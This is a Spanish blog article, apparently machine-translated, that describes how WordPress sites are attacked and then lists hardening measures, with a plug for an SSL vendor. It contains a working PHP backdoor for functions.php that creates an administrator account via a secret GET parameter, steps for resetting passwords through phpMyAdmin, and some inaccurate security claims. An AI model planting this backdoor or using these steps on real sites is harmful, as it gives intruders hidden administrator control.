¿Cómo hackear WordPress?

Intro

Antes de comenzar este artículo, nos gustaría que supieras que el hacking es ilegal, y que no motivamos ni alentamos ninguna actividad malévola. Este artículo es únicamente para conocer cómo trabajan los estafadores y cómo los diversos métodos de seguridad del sitio son esenciales para mantenerlos a raya. Hablemos de ello:

• ¿Cómo hackean los estafadores a WordPress?
• ¿Cómo proteger su sitio WP de los estafadores?

Así que, sin más preámbulos, vamos a comenzar en el tema.

¿Cómo hackear el sitio web de WordPress en línea?

Cómo hackear un sitio web de WordPress en línea (Fuente: wpsecurityninja.com)

Usando WPScan:

WPScan es un escáner de seguridad de WP que ayuda a los propietarios de sitios a comprobar si su sitio de WordPress tiene vulnerabilidades, pero este escáner también es utilizado por los hackers para cumplir con sus motivos para hackear sitios web.

WPScan permite a los propietarios y administradores de sitios especificar las cuentas de usuario de WP y las contraseñas de fuerza bruta y son el primer paso para obtener acceso no autorizado a las cuentas de WP.

(Nombre de usuario y contraseña por fuerza bruta usando WPScan)(image4.png) (Fuerza bruta de nombre de usuario y contraseña usando WPScan. Fuente: Medium)

Ataques MIM:

Los ataques MIM (Man-in-middle) pueden realizarse fácilmente en el caso de usuarios que utilizan redes LAN similares. Los inicios de sesión de los usuarios no encriptados son un objetivo fácil ya que todos los detalles son visibles en texto plano.

El software que participa en la realización de este tipo de ataques puede detectar temas y plugins comprometidos y puede enumerar a los usuarios.

Ataques MIM](image3.png) (Fuente: Medium)

Inyecciones SQL:

Los ataques de inyección SQL se consideran los ataques más prominentes utilizados para penetrar en los sitios web. Estos ataques se dirigen a las puertas de enlace del sitio web y permiten a los hackers penetrar en ellas mediante la implementación de comandos comprometidos.

Inyecciones SQL](image6.jpg) (Fuente: secure.wphackedhelp.com)

Estas penetraciones también permiten a los hackers modificar las bases de datos y los comandos y borrar o robar información del sitio.

Como estos ataques SQL detectan sitios vulnerables y sin parches, hacen que la tarea de pirateo sea fácil y exitosa.

Utilizando My SQL/cPanel:

En este método, los hackers crean una cuenta falsa o modifican la contraseña de un usuario actual del sitio WP. Los hackers intentan penetrar a través del cPanel abriendo PhpMyAdmin. Buscan la tabla que termina en _users y encuentran el usuario que quieren modificar.

Esto les permitirá cambiar las credenciales del usuario que planean hackear. Rastrean el usuario y cambian la contraseña del usuario (del campo user_pass) abriendo el generador de MD5 en línea, y sustituyen la misma por la que desean, y posteriormente hacen clic en #.

Utilizando mi SQL/cPanel](imagen5.jpg) (Los nombres de usuario, las contraseñas con hash de los usuarios, sus identificaciones de correo electrónico, etc. se almacenan en la tabla de la base de datos wp_users. Fuente: firstsiteguide.com)

Los nombres de usuario, las contraseñas con hash de los usuarios, sus identificaciones de correo electrónico, etc. se almacenan en la tabla de la base de datos wp_users.

Editar Functions.php:

Los hackers también acceden al cPanel para modificar el archivo Functions.php. Desbloqueando el Administrador de Archivos, buscan la carpeta del tema activo. Desde la carpeta public_html/wp_content/themes, rastrean el tema y editan el functions.php colocando su código comprometido. El hackeo ya está en proceso porque los hackers han creado una nueva cuenta. Una vez hecho esto, borran el código comprometido.

Crear una nueva cuenta de usuario vía FTP:

Generalmente, las cuentas FTP ayudan a los propietarios de sitios a generar un directorio dentro de su sitio que permite a usuarios específicos subir/descargar sus archivos usando sus credenciales de acceso.

Estos archivos también se ven en Internet.

> Pasos para crear una cuenta FTP en el sitio: > > - Introduzca los datos deseados > - Introduzca el nombre de usuario del nuevo usuario FTP > - Introduzca la contraseña para asignar la cuenta de acceso a través de FTP > - Introduzca el nombre del directorio para dar acceso a través de FTP > - Escriba el espacio en MB que desea asignar a esta carpeta > - Después pulse el botón "Crear " para crear la nueva cuenta.

El nuevo usuario debe cargar los datos mencionados a continuación para poder acceder a través de FTP.

Dirección / Nombre de host / Dirección: sudominio.com o ftp.sudominio.com

Usuario / User: [email protected]

Contraseña: El password asignado a esta cuenta FTP

Puerto: 21 Nombre de la carpeta para la carga/descarga de archivos.

El nuevo usuario tendrá permisos de lectura y escritura tanto en el directorio elegido como en todos los subdirectorios que contenga.

Por ejemplo, si creas el usuario cliente y le das acceso al directorio / home / user / public_html

Penetración a través de Backdoor:

Una forma malévola de penetrar en el sitio es a través de la puerta trasera. Ya sea un estafador que quiere acceder a su sitio, o el usuario víctima, que quiere recuperar el acceso a su sitio a través de la entrada de backdoor, ambos necesitan seguir los siguientes pasos.

En los casos, cuando se crea una nueva cuenta de usuario a través de FTP o se hace un restablecimiento de contraseña, pero no da los resultados deseados, el usuario puede querer hackear su sitio a través de la entrada de backdoor y recuperar su acceso de administrador.

Pasos para crear un Backdoor:

• Abra el archivo functions.php y pegue el código mencionado abajo.

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

• Más tarde guarde los cambios.

Crypto Jacking & Cryptocurrency Mining:

La popularidad de las criptomonedas ha dado lugar a nuevas amenazas cibernéticas como el crypto-jacking, que también se denomina malware de minería de criptomonedas.

El acto de confiscar un ordenador en contra de los deseos del usuario, así como la concienciación, se llama crypto-jacking. En el malware de secuestro de criptomonedas, los estafadores infectan el ordenador del usuario con un malware malicioso entregado a través de un software para comprometer los sistemas y las redes.

Phishing:

El phishing es un método en el que los estafadores embaucan a los usuarios de su información sensible (credenciales de acceso, número de cuenta social, PIN, detalles de la tarjeta de crédito, etc.) haciéndose pasar por entidades legales. Suelen recurrir a los correos electrónicos para cumplir su propósito.

> Ejemplo: Un estafador puede hacerse pasar por una fuente fiable y recabar datos personales de los usuarios para satisfacer sus deseos. > También pueden poner un enlace malicioso en el correo electrónico de phishing y dirigirlos a algún sitio fraudulento para entregar malware.

Malware:

*Las estadísticas de seguridad de WordPress indican que 4000 sitios web de WP están infectados por malware debido a falsos plugins de SEO.

Los estafadores no necesitan una fuente para distribuir malware. Los plugins de SEO, los temas de WP y muchos otros factores presentes en el sitio han motivado a los hackers a utilizar el reciente malware WP-VCD.

Incluso los correos electrónicos de phishing son puertas de entrada para la entrega de malware.

También en este caso, el lema de los hackers es el mismo, es decir, obtener datos sensibles de los usuarios penetrando en los sistemas y robando información.

Ransomware de WordPress:

En el ransomware de WP, los hackers utilizan el malware para bloquear el acceso de los usuarios a los sistemas y redes. El mismo puede ser recuperado por el usuario mediante el pago de un rescate exigido por el hacker. > Ejemplo: El ataque Petya, en el que el hacker encripta tus archivos y datos y pide un rescate a cambio de la clave de descifrado.

Ataque de Cross-Site Scripting (XSS):

Los ataques XSS son llevados a cabo por los hackers inyectando contenido malicioso en el sitio web, explotando así el navegador. Este ataque permite al hacker robar datos de las cookies, modificar el contenido del sitio y apoderarse del sitio web para obtener datos sensibles.

Clickjacking:

En el clickjacking, el hacker hace un intento malicioso de comprometer un botón/enlace y motiva al usuario a hacer clic en el objeto comprometido. Esto permite al hacker ejecutar comandos maliciosos para obtener acceso a datos sensibles del usuario.

Spoofing:

El spoofing es un ataque en el que la persona se disfraza de una identidad fiable para obtener un beneficio ilegal sobre el usuario y engañarlo para que envíe su información confidencial.

Para evitar todos estos ataques de hacking, es necesario tomar medidas de seguridad específicas para asegurar su sitio web WP.

¿Cómo asegurar un sitio web de WordPress contra el hackeo?

¿Cómo asegurar el sitio web de WordPress de la piratería? (Fuente: envisagedigital.co.uk)

Las estadísticas anteriores son suficientes para indicar la popularidad de WordPress. Es esta popularidad la que hace que esta plataforma CMS sea más deseable entre los hackers, que intentan diversos métodos de hackeo para acceder a los sitios web de WP y a sus datos.

Por lo tanto, es esencial saber cómo evitar que los hackers accedan a su sitio WP.

Asegura tu sitio WP con un certificado SSL:

Cuando cualquier dato se carga en el sitio, siempre está en texto plano que es fácilmente visible para todos, incluyendo los hackers. Esto puede ser riesgoso ya que los hackers pueden hacer mal uso de los datos de su sitio.

Los certificados SSL (Secure Socket Layers) son aquellos certificados digitales que ayudan a asegurar su sitio WP con una seguridad de encriptación de 256 bits, convirtiendo así los datos de su sitio en un formato codificado.

Los hackers no pueden leer los códigos aunque hayan accedido a su sitio y, por lo tanto, se ven obligados a abandonar dichos sitios.

Asegura tu sitio WP con un certificado SSL (Fuente: clickssl.net)

Seleccione la marca de certificado SSL que desee (Comodo, Thawte, RapidSSL, etc.) e instale el mismo en su sitio WP. En el caso del tipo de certificado SSL, necesitas entender los dominios y subdominios. Por ejemplo, si su sitio WP tiene subdominios entonces, un solo Certificado Wildcard barato que cuesta sólo $45/año aproximadamente puede asegurar todo su negocio digital.

Emisión rápida, encriptación con clave de 2048 bits, impulso al SEO, sello de confianza del sitio, compatibilidad con el 99% de los navegadores/móviles, política de reembolso y garantía son algunas de las características y ventajas de instalar certificados SSL Wildcard.

La variedad de marcas y opciones de productos SSL, las tarifas económicas y el excelente servicio de atención al cliente son algunas de las ventajas de dirigirse a la tienda ClickSSL para proteger su sitio WP.

Actualice a sus empleados:

Los errores humanos pueden ser desastrosos, así que asegúrese siempre de mantener a sus empleados actualizados sobre las últimas amenazas cibernéticas para evitar que sean vulnerables.

Si sus empleados pueden rastrear las señales sospechosas de un sitio web hackeado en la etapa inicial, pueden informar a los interesados y evitar que su sitio y empresa sufran más daños.

Utilice la autenticación de dos factores (2FA):

La implementación de 2FA durante el inicio de sesión en el sitio es la forma más importante de evitar los ataques de fuerza bruta. Aparte de añadir otra capa de seguridad, también evitan los datos del sitio y de los usuarios.

Esto se debe a que si una capa de seguridad se ve comprometida, el estafador necesita invadir la segunda capa para acceder al sitio web.

Esta es una decisión difícil y, por lo tanto, en la mayoría de los casos, los estafadores terminan trasladándose a otros sitios poco seguros.

> Consejo: WP 2FA es un plugin de WP gratuito que proporciona una capa de seguridad adicional a tu sitio de WP.

Auditar regularmente a los usuarios administradores:

Esto es importante para la seguridad de su sitio WP. Asegúrese de auditar a sus usuarios administradores regularmente y compruebe sus accesos.

También asegúrese de que sus usuarios, así como los empleados, tienen acceso limitado de acuerdo a sus tareas, para evitar fallas de seguridad.

Actualice el núcleo de WordPress regularmente:

¿No está al tanto del núcleo de WP?

Permítame informarle que el núcleo de WP incluye todos los archivos básicos necesarios para el funcionamiento de WP.

El listado de archivos en el archivo zip de WP descargado de WordPress.org

Actualizar el núcleo de WordPress regularmente (Fuente: ithemes.com)

Estos archivos del núcleo deben ser actualizados regularmente después de la publicación de las actualizaciones de seguridad, para parchear todas las vulnerabilidades de seguridad.

Descargar Temas y Plugins de WP de fuentes confiables:

Esto es fundamental porque los plugins pueden ser amenazantes cuando no se actualizan o se instalan desde fuentes no confiables. En el caso de utilizar plugins gratuitos o de pago, compruebe siempre los factores indicados a continuación:

• Valoraciones y comentarios de los usuarios
• Facilidad de uso
• Compatibilidad
• Seguridad
• Confiabilidad

Descargar temas y plugins de WP de fuentes fiables (Fuente: torquemag.io)

La misma regla se aplica a la instalación de temas de WP también.

Actualiza los temas y plugins de WP regularmente:

Los temas y plugins de WP obsoletos o caducados siempre suponen una amenaza para tu sitio de WP ya que pierden sus estándares de seguridad. Para evitar que los hackers utilicen estas puertas de entrada para la propagación de malware para obtener acceso al sitio, asegúrese de actualizar los temas y plugins utilizados en su sitio WP con regularidad.

Esto ayudará a que el plugin funcione correctamente y se mantenga sincronizado con las últimas versiones de WP.

> Consejo: En la página de plugins, puedes ver todos los plugins instalados y un enlace que dice "Activar actualizaciones automáticas" al lado de cada plugin. Actívelo para que las actualizaciones sean automáticas.

Modificar el nombre de administrador por defecto:

Los hackers son demasiado inteligentes, y pueden penetrar fácilmente en su sitio WP utilizando el nombre de administrador por defecto. Siempre es preferible modificar el nombre de usuario del administrador por defecto para evitar que los hackers ejecuten ataques de fuerza bruta para obtener acceso no autorizado a su sitio web.

Conceder Acceso Limitado:

Nunca dé más de lo necesario y la misma regla se aplica a la concesión de acceso al sitio a los usuarios, así como los empleados.

El control de acceso es la regla más importante de la seguridad del sitio y de los datos, ya que define quién puede o no puede acceder al sitio web. Bloquee todas las entradas a WP admin y otros códigos y datos críticos para la seguridad del sitio.

El acceso limitado no sólo mejora la productividad, sino que también asegura su sitio de entradas maliciosas.

Actualizar WordPress:

Cuando su WordPress no está actualizado, su sitio corre el riesgo de ser invadido por hackers.

WordPress domina el 37% de la cuota de mercado, y sigue lanzando actualizaciones con regularidad para corregir agujeros de seguridad y errores. Estas actualizaciones también incluyen nuevas características y mejoras de las existentes que son útiles para mejorar el rendimiento de su sitio.

Por qué deberías actualizar siempre tu wordpress (Fuente: wpbeginner.com)

Mantenga su sitio WP actualizado para una seguridad robusta.

Envolviendo:

Utilice contraseñas fuertes y complejas y mantenga su sitio WP, así como los plugins y temas actualizados para solucionar todos los fallos de seguridad. Tómese el tiempo para educar a sus empleados, ya que siempre ayudará en la prevención de desastres.

Nunca pierdas de vista la seguridad y asegúrate siempre de utilizar los mejores y más confiables plugins de seguridad para mantener tu sitio WP a salvo de miradas indiscretas. Además, asegure su sitio con SSL para mejorar la confianza de los clientes, el negocio y el SEO.

Ahora que ya sabes cómo funcionan los hackers, esperamos que este artículo te ayude a evitar que los hackers penetren en tu sitio y a gestionar tu sitio WP de forma segura.